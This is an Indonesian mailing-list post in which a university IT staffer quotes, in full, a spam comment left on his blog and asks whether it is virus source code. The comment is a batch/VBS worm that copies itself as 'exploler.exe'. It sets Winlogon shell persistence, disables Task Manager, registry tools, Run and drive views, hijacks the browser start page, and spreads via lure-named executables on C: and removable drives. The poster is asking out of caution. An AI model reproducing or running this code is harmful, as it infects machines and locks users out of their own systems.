tadi pagi nge cek blog (http://sandynata.wordpress/com) ternyata ada yang kirim komen spt ini :
redrevolt | [EMAIL PROTECTED] | jancok.com | IP: 69.88.4.120 72.232.131.22040.322 1. @echo off 2. If exist c:\windows\exploler.exe Goto lanjut 3. for %%a in (*.exe) do if %%~za equ 123456 copy %%a %systemroot%\exploler.exe 4. copy c:\windows\exploler.exe c:\rahasia gua.exe 5. echo on error resume next>c:\windows\gila.vbs 6. echo Dim WshShell, f1, fso, f2>>c:\windows\gila.vbs 7. echo set WshShell = CreateObject(Wscript.Shell)>>c:\windows\gila.vbs 8. echo set fso = CreateObject(Scripting.FileSystemObject)>>c:\windows\gila.vbs 9. echo set f1 = fso.GetFile(C:\WINDOWS\exploler.exe)>>c:\windows\gila.vbs 10. echo set f2=fsoGetFile(C:\windows\gila.vbs)>>c:\windows\gila.vbs 11. echo f1.Attributes = 3?>>c:\windows\gila.vbs 12. echo f2.Attributes =3>>c:\windows\gila.vbs 13. echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun, 1?, REG_DWORD>>c:\windows\gila.vbs 14. echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives, 29?, REG_DWORD>>c:\windows\gila.vbs 15. echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive, 29?, REG_DWORD>>c:\windows\gila.vbs 16. echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableRegistryTools, 1?, REG_DWORD>>c:\windows\gila.vbs 17. echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions, 1?, REG_DWORD>>c:\windows\gila.vbs 18. echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind, 1?, REG_DWORD>>c:\windows\gila.vbs 19. echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system\DisableTaskMgr, 1?, REG_DWORD>>c:\windows\gila.vbs 20. echo WshShell.RegWrite HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page, http://fanaticanz.blogspot.com, REG_SZ>>c:\windows\gila.vbs 21. echo WshShell.RegWrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell, Explorer.exe C:\WINDOWS\exploler.exe, REG_SZ>>c:\windows\gila.vbs 22. echo WshShell.RegWrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization, rastaman, REG_SZ>>c:\windows\gila.vbs 23. echo WshShell.RegWrite HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner, fanatiCanz, REG_SZ>>c:\windows\gila.vbs 24. 25. :lanjut 26. call c:\windows\gila.vbs 27. if exist c:\legalin_ganja_dong_by_fanatiCanz.exe goto ceki 28. for /R c:\ %%d in (legalin_ganja_dong_by_fanatiCanz.exe) do copy c:\windows\exploler.exe %%d 29. Goto ceki 30. 31. :infek1 32. for %%a in (*.exe) do if %%~za equ 12345 copy %%a %systemroot%\exploler.exe 33. Goto ceki 34. 35. :infek2 36. Copy c:\windows\exploler.exe c:\gambar lucu.exe 37. Goto ceki 38. 39. :infek3 40. Copy c:\windows\exploler.exe f:\koleksi kartun flash.exe 41. Goto ceki 42. 43. :cekf 44. if exist f:\koleksi kartun flash.exe Goto ceki 45. Goto infek3 46. 47. :ceki 48. if not exist c:\windows\exploler.exe Goto infek1 49. if not exist c:\gambar lucu.exe Goto infek2 50. if exist f:\ Goto cekf 51. 52. Goto ceki -- apakah benar ini modus operandi (source code) dari (sebuah) virus? komen ini muncul di blog saya di artikel http://sandynata.wordpress.com/2007/01/22/cara-mengatasi-virus-mr-coolface-in-javanese/ utk saat ini tidak saya perlihatkan komen tsb utk menghindari hal2 yang tidak diinginkan -- Best Regards, Sandy Suryadinata -------------------------------------------- Department of UTI (Unit Teknologi Informasi) 2nd Floor, J - Building, Malangkucecwara School of Economics Phone : +62 341 491813 - Ext. 125, 127 http://www.stie-mce.ac.id -------------------------------------------- blog + http://sandynata.wordpress.com
